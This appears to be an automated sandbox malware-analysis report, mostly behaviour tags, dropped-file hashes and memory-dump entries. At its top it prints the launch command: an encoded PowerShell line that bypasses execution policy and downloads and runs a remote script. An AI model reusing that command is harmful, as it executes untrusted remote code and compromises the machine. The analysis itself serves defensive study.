C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES95FC.tmpMD5
7b4bae7b1a4fb86d479d7a7d45abab57
SHA1f00a9a82bca413cb94875784900293337872d83c
SHA256bfa85151bda4784c29cc7c0c892f3ca785c80d7a434c4a1b9cfe617a0a326202
SHA512ad7b4d65944bfa4311eb2655743ceb45f7ad4aa33e543835d15aaebeaee57a1ca2e098ba40914528cf81941edae0cbe8494288bcb21fd2c2ae98b04a77b220bb
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.dllMD5
8290e396ce6498b0ecc75c7629284dc5
SHA150d4c1a43e8f75a0f82a532c7e42c2bc326f8a85
SHA2563c5caa83e8f51702acbf1d77ce453d28172229935b9b782d5ca4ee21d87b547a
SHA5128782392ae4a3d28180a7748ca9eea2acb0bc955c923090b30e48b6210a189abc72adb61a39a2a282deeb844030bebb553d6dc1607492d68da87f2875569d5118
-
\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMPMD5
5c3155b03edf4a4e2dc7793d3c91083a
SHA199b2b850c3eabe267fa2c62818a4dd50bc5049d3
SHA2567c87e9fab418ea94ad13df701b6035cddba5cb22517502430d1f86ad2866a192
SHA512a04950d75c41ba60dcac8ea8d8623eb347007af93ae2212a82dffec8bf1cd6d1bc15d46d1c25ce965a3fa815dc8c50ae741bf3a7ee0687e020cfdc99eea917f0
-
\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdlineMD5
05cff55c341e110ebe530869da489356
SHA17c8fee5a4a3c679bf9128a7c40a2432527d86dbd
SHA2563049b210871c80f0f7ba283ff092633c4599ee06ab7d5e787cec1a54b68a32a8
SHA51270f0136882a3026d3086842d709ee71c4d34981f79b48f73b751ea4749b02f1ce94cdff803d3156313e3ccd413e2f2ad3645ba2fe1415cfb2b3a8f1bf66136ef
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/208-42-0x0000000000000000-mapping.dmp
-
memory/360-50-0x0000000000000000-mapping.dmp
-
memory/396-32-0x0000000000000000-mapping.dmp
-
memory/420-40-0x0000000000000000-mapping.dmp
-
memory/420-30-0x0000000000000000-mapping.dmp
-
memory/492-18-0x0000000000000000-mapping.dmp
-
memory/1036-41-0x0000000000000000-mapping.dmp
-
memory/1236-33-0x0000000000000000-mapping.dmp
-
memory/1352-45-0x0000000000000000-mapping.dmp
-
memory/1352-46-0x00007FF81F780000-0x00007FF82016C000-memory.dmpFilesize
9.9MB
-
memory/1356-36-0x0000000000000000-mapping.dmp
-
memory/1532-26-0x0000000000000000-mapping.dmp
-
memory/1628-1-0x0000000001810000-0x0000000001811000-memory.dmpFilesize
4KB
-
memory/1840-44-0x0000000000000000-mapping.dmp
-
memory/1892-7-0x0000000000000000-mapping.dmp
-
memory/2080-38-0x0000000000000000-mapping.dmp
-
memory/2184-20-0x0000000000000000-mapping.dmp
-
memory/2208-27-0x0000000000000000-mapping.dmp
-
memory/2244-39-0x0000000000000000-mapping.dmp
-
memory/2716-37-0x0000000000000000-mapping.dmp
-
memory/2792-10-0x0000000000000000-mapping.dmp
-
memory/2852-24-0x0000000000000000-mapping.dmp
-
memory/2888-25-0x0000000000000000-mapping.dmp
-
memory/3436-35-0x0000000000000000-mapping.dmp
-
memory/3496-17-0x0000000000000000-mapping.dmp
-
memory/3788-15-0x0000000000000000-mapping.dmp
-
memory/3804-34-0x0000000000000000-mapping.dmp
-
memory/3808-16-0x0000000000000000-mapping.dmp
-
memory/3812-43-0x0000000000000000-mapping.dmp
-
memory/3868-23-0x0000000000000000-mapping.dmp
-
memory/3876-21-0x0000000000000000-mapping.dmp
-
memory/3888-51-0x0000000000000000-mapping.dmp
-
memory/3904-22-0x0000000000000000-mapping.dmp
-
memory/3996-31-0x0000000000000000-mapping.dmp
-
memory/4040-19-0x0000000000000000-mapping.dmp
-
memory/4044-14-0x00000234984A0000-0x00000234984A1000-memory.dmpFilesize
4KB
-
memory/4044-5-0x000002349AEA0000-0x000002349AEA1000-memory.dmpFilesize
4KB
-
memory/4044-4-0x0000023498440000-0x0000023498441000-memory.dmpFilesize
4KB
-
memory/4044-3-0x00007FF81F780000-0x00007FF82016C000-memory.dmpFilesize
9.9MB
-
memory/4044-2-0x0000000000000000-mapping.dmp